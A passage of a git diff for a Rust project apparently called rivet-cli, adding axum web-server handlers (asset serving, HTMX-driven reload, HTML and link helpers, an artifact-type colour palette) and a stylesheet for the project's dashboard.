(axum::http::header::CACHE_CONTROL, "no-cache"), + ], + bytes, + ) + .into_response(); + } + } + + ( + axum::http::StatusCode::NOT_FOUND, + [(axum::http::header::CONTENT_TYPE, "text/plain")], + format!("WASM asset not found: {path}").into_bytes(), + ) + .into_response() +} + +/// POST /reload — re-read the project from disk and replace the shared state. +/// +/// Uses the `HX-Current-URL` header (sent automatically by HTMX) to redirect +/// back to the current page after reload, preserving the user's position. +async fn reload_handler( + State(state): State, + headers: axum::http::HeaderMap, +) -> impl IntoResponse { + let (project_path, schemas_dir, port) = { + let guard = state.read().await; + ( + guard.project_path_buf.clone(), + guard.schemas_dir.clone(), + guard.context.port, + ) + }; + + match reload_state(&project_path, &schemas_dir, port) { + Ok(new_state) => { + let mut guard = state.write().await; + *guard = new_state; + + // Redirect back to wherever the user was (HTMX sends HX-Current-URL). + // Extract the path portion from the full URL (e.g. "http://localhost:3001/documents/DOC-001" → "/documents/DOC-001"). + // Navigate back to wherever the user was (HTMX sends HX-Current-URL). + // HX-Location does a client-side HTMX navigation (fetch + swap + push-url). + let redirect_url = headers + .get("HX-Current-URL") + .and_then(|v| v.to_str().ok()) + .and_then(|full_url| { + full_url + .find("://") + .and_then(|i| full_url[i + 3..].find('/')) + .map(|j| { + let start = full_url.find("://").unwrap() + 3 + j; + full_url[start..].to_owned() + }) + }) + .unwrap_or_else(|| "/".to_owned()); + + let location_json = format!( + "{{\"path\":\"{}\",\"target\":\"#content\"}}", + redirect_url.replace('"', "\\\"") + ); + + ( + axum::http::StatusCode::OK, + [("HX-Location", location_json)], + "reloaded".to_owned(), + ) + } + Err(e) => { + eprintln!("reload error: {e:#}"); + ( + axum::http::StatusCode::INTERNAL_SERVER_ERROR, + [( + "HX-Location", + "{\"path\":\"/\",\"target\":\"#content\"}".to_owned(), + )], + format!("reload failed: {e}"), + ) + } + } +} + +/// GET /docs-asset/{*path} — serve static files (images, SVG, etc.) from docs directories. +async fn docs_asset( + State(state): State, + Path(path): Path, +) -> impl IntoResponse { + let state = state.read().await; + + // Sanitize: reject path traversal + if path.contains("..") { + return ( + axum::http::StatusCode::BAD_REQUEST, + [("Content-Type", "text/plain")], + Vec::new(), + ); + } + + // Search through all doc directories for the requested file + for dir in &state.doc_dirs { + let file_path = dir.join(&path); + if file_path.is_file() + && let Ok(bytes) = std::fs::read(&file_path) + { + let content_type = match file_path.extension().and_then(|e| e.to_str()).unwrap_or("") { + "png" => "image/png", + "jpg" | "jpeg" => "image/jpeg", + "gif" => "image/gif", + "svg" => "image/svg+xml", + "webp" => "image/webp", + "pdf" => "application/pdf", + _ => "application/octet-stream", + }; + return ( + axum::http::StatusCode::OK, + [("Content-Type", content_type)], + bytes, + ); + } + } + + ( + axum::http::StatusCode::NOT_FOUND, + [("Content-Type", "text/plain")], + b"not found".to_vec(), + ) +} + +// ── Color palette ──────────────────────────────────────────────────────── + +pub(crate) fn type_color_map() -> HashMap { + let pairs: &[(&str, &str)] = &[ + // STPA + ("loss", "#dc3545"), + ("hazard", "#fd7e14"), + ("system-constraint", "#20c997"), + ("controller", "#6f42c1"), + ("uca", "#e83e8c"), + ("control-action", "#17a2b8"), + ("feedback", "#6610f2"), + ("causal-factor", "#d63384"), + ("safety-constraint", "#20c997"), + ("loss-scenario", "#e83e8c"), + ("controller-constraint", "#20c997"), + ("controlled-process", "#6610f2"), + ("sub-hazard", "#fd7e14"), + // ASPICE + ("stakeholder-req", "#0d6efd"), + ("system-req", "#0dcaf0"), + ("system-architecture", "#198754"), + ("sw-req", "#198754"), + ("sw-architecture", "#0d6efd"), + ("sw-detailed-design", "#6610f2"), + ("sw-unit", "#6f42c1"), + ("system-verification", "#6610f2"), + ("sw-verification", "#6610f2"), + ("system-integration-verification", "#6610f2"), + ("sw-integration-verification", "#6610f2"), + ("sw-unit-verification", "#6610f2"), + ("qualification-verification", "#6610f2"), + // Dev + ("requirement", "#0d6efd"), + ("design-decision", "#198754"), + ("feature", "#6f42c1"), + // Cybersecurity + ("asset", "#ffc107"), + ("threat", "#dc3545"), + ("cybersecurity-req", "#fd7e14"), + ("vulnerability", "#e83e8c"), + ("attack-path", "#dc3545"), + ("cybersecurity-goal", "#0d6efd"), + ("cybersecurity-control", "#198754"), + ("security-verification", "#6610f2"), + ("risk-assessment", "#fd7e14"), + ("security-event", "#e83e8c"), + ]; + pairs + .iter() + .map(|(k, v)| (k.to_string(), v.to_string())) + .collect() +} + +/// Return a colored badge `` for an artifact type. +/// +/// Uses the `type_color_map` hex color as text and computes a 12%-opacity +/// tinted background from it. +pub(crate) fn badge_for_type(type_name: &str) -> String { + let colors = type_color_map(); + let hex = colors + .get(type_name) + .map(|s| s.as_str()) + .unwrap_or("#5b2d9e"); + // Parse hex → rgb + let hex_digits = hex.trim_start_matches('#'); + let r = u8::from_str_radix(&hex_digits[0..2], 16).unwrap_or(91); + let g = u8::from_str_radix(&hex_digits[2..4], 16).unwrap_or(45); + let b = u8::from_str_radix(&hex_digits[4..6], 16).unwrap_or(158); + format!( + "{}", + html_escape(type_name) + ) +} + +// ── HTML helpers ───────────────────────────────────────────────────────── + +pub(crate) fn html_escape(s: &str) -> String { + s.replace('&', "&") + .replace('<', "<") + .replace('>', ">") + .replace('"', """) +} + +/// Rewrite relative image `src` paths to serve through `/docs-asset/`. +/// Leaves absolute URLs (http://, https://, //) unchanged. +pub(crate) fn rewrite_image_paths(html: &str) -> String { + let mut result = String::with_capacity(html.len()); + let mut rest = html; + while let Some(pos) = rest.find("src=\"") { + result.push_str(&rest[..pos]); + let after_src = &rest[pos + 5..]; // after src=" + if let Some(end) = after_src.find('"') { + let path = &after_src[..end]; + result.push_str("src=\""); + if path.starts_with("http://") + || path.starts_with("https://") + || path.starts_with("//") + || path.starts_with('/') + { + result.push_str(path); + } else { + result.push_str("/docs-asset/"); + result.push_str(path); + } + result.push('"'); + rest = &after_src[end + 1..]; + } else { + result.push_str("src=\""); + rest = after_src; + } + } + result.push_str(rest); + result +} + +/// Turn `path/to/file.rs:42` patterns into clickable `/source/path/to/file.rs#L42` links. +/// Also handles ranges like `file.rs:10-20` and plain `path/to/file.rs` (no line). +pub(crate) fn linkify_source_refs(s: &str) -> String { + // Regex-free: scan for patterns like word/word.ext:digits or word/word.ext:digits-digits + let mut result = String::new(); + let src = s; + let mut pos = 0usize; + + while pos < src.len() { + // Look for file-like patterns: contains '/' or '.' and optionally ':digits' + if let Some(m) = find_source_ref(&src[pos..]) { + result.push_str(&src[pos..pos + m.start]); + let file_path = &m.file; + let encoded_path = urlencoding::encode(file_path); + if let Some(line) = m.line { + if let Some(end_line) = m.end_line { + result.push_str(&format!( + "{file_path}:{line}-{end_line}" + )); + } else { + result.push_str(&format!( + "{file_path}:{line}" + )); + } + } else { + result.push_str(&format!( + "{file_path}" + )); + } + pos += m.start + m.len; + } else { + result.push_str(&src[pos..]); + break; + } + } + result +} + +struct SourceRefMatch { + start: usize, + len: usize, + file: String, + line: Option, + end_line: Option, +} + +/// Find the next source-ref pattern in text: `some/path.ext:line` or `some/path.ext:line-line` +/// File must contain a `/` or `.` with a recognized extension. +fn find_source_ref(s: &str) -> Option { + let extensions = [ + ".rs", ".yaml", ".yml", ".toml", ".md", ".py", ".js", ".ts", ".tsx", ".jsx", ".c", ".h", + ".cpp", ".hpp", ".go", ".java", ".rb", ".sh", ".json", ".xml", ".aadl", + ]; + let len = s.len(); + let mut i = 0; + while i < len { + // Try to match a file path starting at position i + // A file path: sequence of [a-zA-Z0-9_/.\-] containing at least one '/' and ending with a known extension + let start = i; + let mut j = i; + let mut has_slash = false; + let mut has_ext = false; + while j < len { + let c = s.as_bytes()[j]; + if c.is_ascii_alphanumeric() || c == b'_' || c == b'/' || c == b'.' || c == b'-' { + if c == b'/' { + has_slash = true; + } + j += 1; + } else { + break; + } + } + if has_slash && j > start + 2 { + let candidate = &s[start..j]; + // Check if it ends with a known extension + for ext in &extensions { + if candidate.ends_with(ext) { + has_ext = true; + break; + } + } + if has_ext { + let file = candidate.to_string(); + // Check for :line or :line-line + if j < len && s.as_bytes()[j] == b':' { + let _colon_pos = j; + j += 1; + let line_start = j; + while j < len && s.as_bytes()[j].is_ascii_digit() { + j += 1; + } + if j > line_start { + let line: u32 = s[line_start..j].parse().unwrap_or(0); + if line > 0 { + // Check for range: -digits + if j < len && s.as_bytes()[j] == b'-' { + let dash = j; + j += 1; + let end_start = j; + while j < len && s.as_bytes()[j].is_ascii_digit() { + j += 1; + } + if j > end_start { + let end_line: u32 = s[end_start..j].parse().unwrap_or(0); + if end_line > 0 { + return Some(SourceRefMatch { + start, + len: j - start, + file, + line: Some(line), + end_line: Some(end_line), + }); + } + } + // Not a valid range, just use line + return Some(SourceRefMatch { + start, + len: dash - start, + file, + line: Some(line), + end_line: None, + }); + } + return Some(SourceRefMatch { + start, + len: j - start, + file, + line: Some(line), + end_line: None, + }); + } + } + } + // No line number, just file path + return Some(SourceRefMatch { + start, + len: j - start, + file, + line: None, + end_line: None, + }); + } + } + i += 1; + } + None +} diff --git a/rivet-cli/src/serve/styles.rs b/rivet-cli/src/serve/styles.rs new file mode 100644 index 0000000..6d45197 --- /dev/null +++ b/rivet-cli/src/serve/styles.rs @@ -0,0 +1,580 @@ +pub const CSS: &str = r#" +/* ── Reset & base ─────────────────────────────────────────────── */ +*,*::before,*::after{box-sizing:border-box;margin:0;padding:0} +:root{ + --bg: #f5f5f7; + --surface:#fff; + --sidebar:#0f0f13; + --sidebar-hover:#1c1c24; + --sidebar-text:#9898a6; + --sidebar-active:#fff; + --text: #1d1d1f; + --text-secondary:#6e6e73; + --border: #e5e5ea; + --accent: #3a86ff; + --accent-hover:#2568d6; + --radius: 10px; + --radius-sm:6px; + --shadow: 0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04); + --shadow-md:0 4px 12px rgba(0,0,0,.06),0 1px 3px rgba(0,0,0,.04); + --mono: 'JetBrains Mono','Fira Code','SF Mono',Menlo,monospace; + --font: 'Atkinson Hyperlegible',system-ui,-apple-system,sans-serif; + --transition:180ms ease; +} +html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-rendering:optimizeLegibility} +body{font-family:var(--font);color:var(--text);background:var(--bg);line-height:1.6;font-size:15px} + +/* ── Links ────────────────────────────────────────────────────── */ +a{color:var(--accent);text-decoration:none;transition:color var(--transition)} +a:hover{color:var(--accent-hover)} +a:focus-visible{outline:2px solid var(--accent);outline-offset:2px;border-radius:3px} + +/* ── Shell layout ─────────────────────────────────────────────── */ +.shell{display:flex;min-height:100vh} +.content-area{display:flex;flex-direction:column;flex:1;min-width:0} + +/* ── Sidebar navigation ──────────────────────────────────────── */ +nav{width:232px;background:var(--sidebar);color:var(--sidebar-text); + padding:1.75rem 1rem;flex-shrink:0;display:flex;flex-direction:column; + position:sticky;top:0;height:100vh;overflow-y:auto; + border-right:1px solid rgba(255,255,255,.06)} +nav h1{font-size:1.05rem;font-weight:700;color:var(--sidebar-active); + margin-bottom:2rem;letter-spacing:.04em;padding:0 .75rem; + display:flex;align-items:center;gap:.5rem} +nav h1::before{content:'';display:inline-block;width:8px;height:8px; + border-radius:50%;background:var(--accent);flex-shrink:0} +nav ul{list-style:none;display:flex;flex-direction:column;gap:2px} +nav li{margin:0} +nav a{display:flex;align-items:center;gap:.5rem;padding:.5rem .75rem;border-radius:var(--radius-sm); + color:var(--sidebar-text);font-size:.875rem;font-weight:500; + transition:all var(--transition)} +nav a:hover{background:var(--sidebar-hover);color:var(--sidebar-active);text-decoration:none} +nav a.active{background:rgba(58,134,255,.08);color:var(--sidebar-active);border-left:2px solid var(--accent);padding-left:calc(.75rem - 2px)} +nav a:focus-visible{outline:2px solid var(--accent);outline-offset:-2px} + +/* ── Main content ─────────────────────────────────────────────── */ +main{flex:1;padding:2.5rem 3rem;max-width:1400px;min-width:0;overflow-y:auto} +main.htmx-swapping{opacity:.4;transition:opacity 150ms ease-out} +main.htmx-settling{opacity:1;transition:opacity 200ms ease-in} + +/* ── Loading bar ──────────────────────────────────────────────── */ +#loading-bar{position:fixed;top:0;left:0;width:0;height:2px;background:var(--accent); + z-index:9999;transition:none;pointer-events:none} +#loading-bar.active{width:85%;transition:width 8s cubic-bezier(.1,.05,.1,1)} +#loading-bar.done{width:100%;transition:width 100ms ease;opacity:0;transition:width 100ms ease,opacity 300ms ease 100ms} + +/* ── Typography ───────────────────────────────────────────────── */ +h2{font-size:1.4rem;font-weight:700;margin-bottom:1.25rem;color:var(--text);letter-spacing:-.01em;padding-bottom:.75rem;border-bottom:1px solid var(--border)} +h3{font-size:1.05rem;font-weight:600;margin:1.5rem 0 .75rem;color:var(--text)} +code,pre{font-family:var(--mono);font-size:.85em} +pre{background:#f1f1f3;padding:1rem;border-radius:var(--radius-sm);overflow-x:auto} + +/* ── Tables ───────────────────────────────────────────────────── */ +table{width:100%;border-collapse:collapse;margin-bottom:1.5rem;font-size:.9rem} +th,td{text-align:left;padding:.65rem .875rem} +th{font-weight:600;font-size:.75rem;text-transform:uppercase;letter-spacing:.06em; + color:var(--text-secondary);border-bottom:2px solid var(--border);background:transparent} +td{border-bottom:1px solid var(--border)} +tbody tr{transition:background var(--transition)} +tbody tr:nth-child(even){background:rgba(0,0,0,.015)} +tbody tr:hover{background:rgba(58,134,255,.04)} +.tbl-filter-wrap{margin-bottom:.5rem} +.tbl-filter{width:100%;max-width:20rem;padding:.4rem .65rem;font-size:.85rem;font-family:var(--mono); + border:1px solid var(--border);border-radius:5px;background:var(--surface);color:var(--text); + outline:none;transition:border-color var(--transition)} +.tbl-filter:focus{border-color:var(--accent)} +.tbl-sort-arrow{font-size:.7rem;opacity:.6;margin-left:.25rem} +th:hover .tbl-sort-arrow{opacity:1} +td a{font-family:var(--mono);font-size:.85rem;font-weight:500} + +/* ── Badges ───────────────────────────────────────────────────── */ +.badge{display:inline-flex;align-items:center;padding:.2rem .55rem;border-radius:5px; + font-size:.73rem;font-weight:600;letter-spacing:.02em;line-height:1.4;white-space:nowrap} +.badge-error{background:#fee;color:#c62828} +.badge-warn{background:#fff8e1;color:#8b6914} +.badge-info{background:#e8f4fd;color:#0c5a82} +.badge-ok{background:#e6f9ed;color:#15713a} +.badge-type{background:#f0ecf9;color:#5b2d9e;font-family:var(--mono);font-size:.72rem} + +/* ── Validation bar ──────────────────────────────────────────── */ +.validation-bar{padding:1rem 1.25rem;border-radius:var(--radius);margin-bottom:1.25rem;font-weight:600;font-size:.95rem} +.validation-bar.pass{background:linear-gradient(135deg,#e6f9ed,#d4f5e0);color:#15713a;border:1px solid #b8e8c8} +.validation-bar.fail{background:linear-gradient(135deg,#fee,#fdd);color:#c62828;border:1px solid #f4c7c3} + +/* ── Status progress bars ────────────────────────────────────── */ +.status-bar-row{display:flex;align-items:center;gap:.75rem;margin-bottom:.5rem;font-size:.85rem} +.status-bar-label{width:80px;text-align:right;font-weight:500;color:var(--text-secondary)} +.status-bar-track{flex:1;height:20px;background:#e5e5ea;border-radius:4px;overflow:hidden;position:relative} +.status-bar-fill{height:100%;border-radius:4px;transition:width .3s ease} +.status-bar-count{width:40px;font-variant-numeric:tabular-nums;color:var(--text-secondary)} + +/* ── Cards ────────────────────────────────────────────────────── */ +.card{background:var(--surface);border-radius:var(--radius);padding:1.5rem; + margin-bottom:1.25rem;box-shadow:var(--shadow);border:1px solid var(--border); + transition:box-shadow var(--transition)} + +/* ── Stat grid ────────────────────────────────────────────────── */ +.stat-grid{display:grid;grid-template-columns:repeat(auto-fill,minmax(160px,1fr));gap:1rem;margin-bottom:1.75rem} +.stat-box{background:var(--surface);border-radius:var(--radius);padding:1.25rem 1rem;text-align:center; + box-shadow:var(--shadow);border:1px solid var(--border);transition:box-shadow var(--transition),transform var(--transition); + border-top:3px solid var(--border)} +.stat-box:hover{box-shadow:var(--shadow-md);transform:translateY(-1px)} +.stat-box .number{font-size:2rem;font-weight:800;letter-spacing:-.02em; + font-variant-numeric:tabular-nums;line-height:1.2} +.stat-box .label{font-size:.8rem;font-weight:500;color:var(--text-secondary);margin-top:.25rem; + text-transform:uppercase;letter-spacing:.04em} +.stat-blue{border-top-color:#3a86ff}.stat-blue .number{color:#3a86ff} +.stat-green{border-top-color:#15713a}.stat-green .number{color:#15713a} +.stat-orange{border-top-color:#e67e22}.stat-orange .number{color:#e67e22} +.stat-red{border-top-color:#c62828}.stat-red .number{color:#c62828} +.stat-amber{border-top-color:#b8860b}.stat-amber .number{color:#b8860b} +.stat-purple{border-top-color:#6f42c1}.stat-purple .number{color:#6f42c1} + +/* ── Link pills ───────────────────────────────────────────────── */ +.link-pill{display:inline-block;padding:.15rem .45rem;border-radius:4px; + font-size:.76rem;font-family:var(--mono);background:#f0f0f3; + color:var(--text-secondary);margin:.1rem;font-weight:500} + +/* ── Forms ────────────────────────────────────────────────────── */ +.form-row{display:flex;gap:1rem;align-items:end;flex-wrap:wrap;margin-bottom:1rem} +.form-row label{font-size:.8rem;font-weight:600;color:var(--text-secondary); + text-transform:uppercase;letter-spacing:.04em} +.form-row select,.form-row input[type="text"],.form-row input[type="search"], +.form-row input:not([type]),.form-row input[list]{ + padding:.5rem .75rem;border:1px solid var(--border);border-radius:var(--radius-sm); + font-size:.875rem;font-family:var(--font);background:var(--surface);color:var(--text); + transition:border-color var(--transition),box-shadow var(--transition);appearance:none; + -webkit-appearance:none} +.form-row select{padding-right:2rem;background-image:url("data:image/svg+xml,%3Csvg width='10' height='6' viewBox='0 0 10 6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1 1l4 4 4-4' stroke='%236e6e73' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/svg%3E"); + background-repeat:no-repeat;background-position:right .75rem center} +.form-row input:focus,.form-row select:focus{ + outline:none;border-color:var(--accent);box-shadow:0 0 0 3px rgba(58,134,255,.15)} +.form-row input[type="range"]{padding:0;border:none;accent-color:var(--accent);width:100%} +.form-row input[type="range"]:focus{box-shadow:none} +.form-row button{padding:.5rem 1.25rem;background:var(--accent);color:#fff;border:none; + border-radius:var(--radius-sm);font-size:.875rem;font-weight:600; + font-family:var(--font);cursor:pointer;transition:all var(--transition); + box-shadow:0 1px 2px rgba(0,0,0,.08)} +.form-row button:hover{background:var(--accent-hover);box-shadow:0 2px 6px rgba(58,134,255,.25);transform:translateY(-1px)} +.form-row button:active{transform:translateY(0)} +.form-row button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} + +/* ── Definition lists ─────────────────────────────────────────── */ +dl{margin:.75rem 0} +dt{font-weight:600;font-size:.8rem;color:var(--text-secondary);margin-top:.75rem; + text-transform:uppercase;letter-spacing:.04em} +dd{margin-left:0;margin-bottom:.25rem;margin-top:.2rem} + +/* ── Meta text ────────────────────────────────────────────────── */ +.meta{color:var(--text-secondary);font-size:.85rem} + +/* ── Nav icons & badges ───────────────────────────────────────── */ +.nav-icon{display:inline-flex;width:1.25rem;height:1.25rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.5} +nav a:hover .nav-icon,nav a.active .nav-icon{opacity:.9} +.nav-label{display:flex;align-items:center;gap:.5rem;flex:1;min-width:0} +.nav-badge{font-size:.65rem;font-weight:700;padding:.1rem .4rem;border-radius:4px; + background:rgba(255,255,255,.08);color:rgba(255,255,255,.4);margin-left:auto;flex-shrink:0} +.nav-badge-error{background:rgba(220,53,69,.2);color:#ff6b7a} +nav .nav-divider{height:1px;background:rgba(255,255,255,.06);margin:.75rem .75rem} + +/* ── Context bar ─────────────────────────────────────────────── */ +.context-bar{display:flex;align-items:center;gap:.75rem;padding:.5rem 1.5rem; + background:var(--surface);border-bottom:1px solid var(--border);font-size:.78rem;color:var(--text-secondary); + flex-wrap:wrap} +.context-bar .ctx-project{font-weight:700;color:var(--text);font-size:.82rem} +.context-bar .ctx-sep{opacity:.25} +.context-bar .ctx-git{font-family:var(--mono);font-size:.72rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(58,134,255,.08);color:var(--accent)} +.context-bar .ctx-dirty{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(220,53,69,.1);color:#c62828} +.context-bar .ctx-clean{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; + background:rgba(21,113,58,.1);color:#15713a} +.context-bar .ctx-time{margin-left:auto;opacity:.6} +.ctx-switcher{position:relative;display:inline-flex;align-items:center} +.ctx-switcher-details{position:relative} +.ctx-switcher-details summary{cursor:pointer;list-style:none;display:inline-flex;align-items:center; + padding:.15rem .35rem;border-radius:4px;opacity:.5;transition:opacity .15s} +.ctx-switcher-details summary:hover{opacity:1;background:rgba(255,255,255,.06)} +.ctx-switcher-details summary::-webkit-details-marker{display:none} +.ctx-switcher-dropdown{position:absolute;top:100%;left:0;z-index:100;margin-top:.35rem; + background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-sm); + padding:.5rem;min-width:280px;box-shadow:0 8px 24px rgba(0,0,0,.35)} +.ctx-switcher-item{padding:.5rem .65rem;border-radius:4px} +.ctx-switcher-item:hover{background:rgba(255,255,255,.04)} +.ctx-switcher-item .ctx-switcher-name{display:block;font-weight:600;font-size:.8rem;color:var(--text);margin-bottom:.2rem} +.ctx-switcher-item .ctx-switcher-cmd{display:block;font-size:.7rem;color:var(--text-secondary); + padding:.2rem .4rem;background:rgba(255,255,255,.04);border-radius:3px; + font-family:var(--mono);user-select:all;cursor:text} + +/* ── Footer ──────────────────────────────────────────────────── */ +.footer{padding:2rem 0 1rem;text-align:center;font-size:.75rem;color:var(--text-secondary); + border-top:1px solid var(--border);margin-top:3rem} + +/* ── Verification ────────────────────────────────────────────── */ +.ver-level{margin-bottom:1.5rem} +.ver-level-header{display:flex;align-items:center;gap:.75rem;margin-bottom:.75rem} +.ver-level-title{font-size:1rem;font-weight:600;color:var(--text)} +.ver-level-arrow{color:var(--text-secondary);font-size:.85rem} +details.ver-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); + display:flex;align-items:center;gap:.75rem;transition:background var(--transition)} +details.ver-row>summary::-webkit-details-marker{display:none} +details.ver-row>summary:hover{background:rgba(58,134,255,.04)} +details.ver-row[open]>summary{background:rgba(58,134,255,.04);border-bottom-color:var(--accent)} +details.ver-row>.ver-detail{padding:1rem 1.5rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border)} +.ver-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4} +details.ver-row[open] .ver-chevron{transform:rotate(90deg)} +.ver-steps{width:100%;border-collapse:collapse;font-size:.85rem;margin-top:.5rem} +.ver-steps th{text-align:left;font-weight:600;font-size:.72rem;text-transform:uppercase; + letter-spacing:.04em;color:var(--text-secondary);padding:.4rem .5rem;border-bottom:1px solid var(--border)} +.ver-steps td{padding:.4rem .5rem;border-bottom:1px solid rgba(0,0,0,.04);vertical-align:top} +.method-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600; + background:#e8f4fd;color:#0c5a82} + +/* ── Results ─────────────────────────────────────────────────── */ +.result-pass{color:#15713a}.result-fail{color:#c62828}.result-skip{color:#6e6e73} +.result-error{color:#e67e22}.result-blocked{color:#8b6914} +.result-dot{display:inline-block;width:8px;height:8px;border-radius:50%;margin-right:.35rem} +.result-dot-pass{background:#15713a}.result-dot-fail{background:#c62828} +.result-dot-skip{background:#c5c5cd}.result-dot-error{background:#e67e22}.result-dot-blocked{background:#b8860b} + +/* ── Diff ────────────────────────────────────────────────────── */ +.diff-added{background:rgba(21,113,58,.08)} +.diff-removed{background:rgba(198,40,40,.08)} +.diff-modified{background:rgba(184,134,11,.08)} +.diff-icon{display:inline-flex;align-items:center;justify-content:center;width:1.5rem;height:1.5rem; + border-radius:4px;font-size:.85rem;font-weight:700;flex-shrink:0;margin-right:.35rem} +.diff-icon-add{background:rgba(21,113,58,.12);color:#15713a} +.diff-icon-remove{background:rgba(198,40,40,.12);color:#c62828} +.diff-icon-modify{background:rgba(184,134,11,.12);color:#b8860b} +.diff-summary{display:flex;gap:1.25rem;padding:.75rem 1rem;border-radius:var(--radius-sm); + background:var(--surface);border:1px solid var(--border);margin-bottom:1.25rem;font-size:.9rem;font-weight:600} +.diff-summary-item{display:flex;align-items:center;gap:.35rem} +.diff-old{color:#c62828;text-decoration:line-through;font-size:.85rem} +.diff-new{color:#15713a;font-size:.85rem} +.diff-arrow{color:var(--text-secondary);margin:0 .25rem;font-size:.8rem} +details.diff-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); + display:flex;align-items:center;gap:.5rem;transition:background var(--transition)} +details.diff-row>summary::-webkit-details-marker{display:none} +details.diff-row>summary:hover{background:rgba(58,134,255,.04)} +details.diff-row[open]>summary{background:rgba(184,134,11,.06);border-bottom-color:var(--border)} +details.diff-row>.diff-detail{padding:.75rem 1.25rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border);font-size:.88rem} +.diff-field{padding:.3rem 0;display:flex;align-items:baseline;gap:.5rem} +.diff-field-name{font-weight:600;font-size:.8rem;color:var(--text-secondary);min-width:100px; + text-transform:uppercase;letter-spacing:.03em} + +/* ── Detail actions ──────────────────────────────────────────── */ +.detail-actions{display:flex;gap:.75rem;align-items:center;margin-top:1rem} +.btn{display:inline-flex;align-items:center;gap:.4rem;padding:.45rem 1rem;border-radius:var(--radius-sm); + font-size:.85rem;font-weight:600;font-family:var(--font);text-decoration:none; + transition:all var(--transition);cursor:pointer;border:none} +.btn-primary{background:var(--accent);color:#fff;box-shadow:0 1px 2px rgba(0,0,0,.08)} +.btn-primary:hover{background:var(--accent-hover);transform:translateY(-1px);color:#fff;text-decoration:none} +.btn-secondary{background:transparent;color:var(--text-secondary);border:1px solid var(--border)} +.btn-secondary:hover{background:rgba(0,0,0,.03);color:var(--text);text-decoration:none} + +/* ── SVG Viewer (fullscreen / popout / resize) ───────────────── */ +.svg-viewer{position:relative;border:1px solid var(--border);border-radius:6px;overflow:hidden; + resize:both;min-height:300px} +.svg-viewer-toolbar{position:absolute;top:8px;right:8px;z-index:20;display:flex;gap:4px} +.svg-viewer-toolbar button{background:rgba(0,0,0,0.6);color:#fff;border:1px solid rgba(255,255,255,0.2); + border-radius:4px;padding:4px 8px;cursor:pointer;font-size:16px;line-height:1; + transition:background var(--transition)} +.svg-viewer-toolbar button:hover{background:rgba(0,0,0,0.8)} +.svg-viewer.fullscreen{position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:9999; + border-radius:0;background:var(--bg);resize:none} +.svg-viewer.fullscreen .svg-viewer-toolbar{top:16px;right:16px} +.svg-viewer .graph-container{border:none;border-radius:0} +.svg-viewer.fullscreen .graph-container{height:100vh;min-height:100vh} + +/* ── Graph ────────────────────────────────────────────────────── */ +.graph-container{border-radius:var(--radius);overflow:hidden;background:#fafbfc;cursor:grab; + height:calc(100vh - 280px);min-height:400px;position:relative;border:1px solid var(--border)} +.graph-container:active{cursor:grabbing} +.graph-container svg{display:block;width:100%;height:100%;position:absolute;top:0;left:0} +.graph-controls{position:absolute;top:.75rem;right:.75rem;display:flex;flex-direction:column;gap:.35rem;z-index:10} +.graph-controls button{width:34px;height:34px;border:1px solid var(--border);border-radius:var(--radius-sm); + background:var(--surface);font-size:1rem;cursor:pointer;display:flex;align-items:center; + justify-content:center;box-shadow:var(--shadow);color:var(--text); + transition:all var(--transition)} +.graph-controls button:hover{background:#f0f0f3;box-shadow:var(--shadow-md)} +.graph-controls button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} +.graph-legend{display:flex;flex-wrap:wrap;gap:.75rem;padding:.75rem 0 .25rem;font-size:.82rem} +.graph-legend-item{display:flex;align-items:center;gap:.35rem;color:var(--text-secondary)} +.graph-legend-swatch{width:12px;height:12px;border-radius:3px;flex-shrink:0} + +/* ── Filter grid ──────────────────────────────────────────────── */ +.filter-grid{display:flex;flex-wrap:wrap;gap:.6rem;margin-bottom:.75rem} +.filter-grid label{font-size:.8rem;display:flex;align-items:center;gap:.3rem; + color:var(--text-secondary);cursor:pointer;padding:.2rem .45rem; + border-radius:4px;transition:background var(--transition); + text-transform:none;letter-spacing:0;font-weight:500} +.filter-grid label:hover{background:rgba(58,134,255,.06)} +.filter-grid input[type="checkbox"]{margin:0;accent-color:var(--accent);width:14px;height:14px; + cursor:pointer;border-radius:3px} + +/* ── Document styles ──────────────────────────────────────────── */ +.doc-body{line-height:1.8;font-size:.95rem} +.doc-body h1{font-size:1.4rem;font-weight:700;margin:2rem 0 .75rem;color:var(--text); + border-bottom:2px solid var(--border);padding-bottom:.5rem} +.doc-body h2{font-size:1.2rem;font-weight:600;margin:1.5rem 0 .5rem;color:var(--text)} +.doc-body h3{font-size:1.05rem;font-weight:600;margin:1.25rem 0 .4rem;color:var(--text-secondary)} +.doc-body p{margin:.5rem 0} +.doc-body ul{margin:.5rem 0 .5rem 1.5rem} +.doc-body li{margin:.2rem 0} +.doc-body img{border-radius:6px;margin:.75rem 0;box-shadow:0 2px 8px rgba(0,0,0,.1)} +.doc-body pre.mermaid{background:transparent;border:1px solid var(--border);border-radius:6px;padding:1rem;text-align:center} +.artifact-ref{display:inline-flex;align-items:center;padding:.15rem .5rem;border-radius:5px; + font-size:.8rem;font-weight:600;font-family:var(--mono);background:#edf2ff; + color:#3a63c7;cursor:pointer;text-decoration:none; + border:1px solid #d4def5;transition:all var(--transition)} +.artifact-ref:hover{background:#d4def5;text-decoration:none;transform:translateY(-1px);box-shadow:0 2px 4px rgba(0,0,0,.06)} +.artifact-ref.broken{background:#fde8e8;color:#c62828;border-color:#f4c7c3;cursor:default} +.artifact-ref.broken:hover{transform:none;box-shadow:none} +/* ── Artifact hover preview ────────────────────────────────── */ 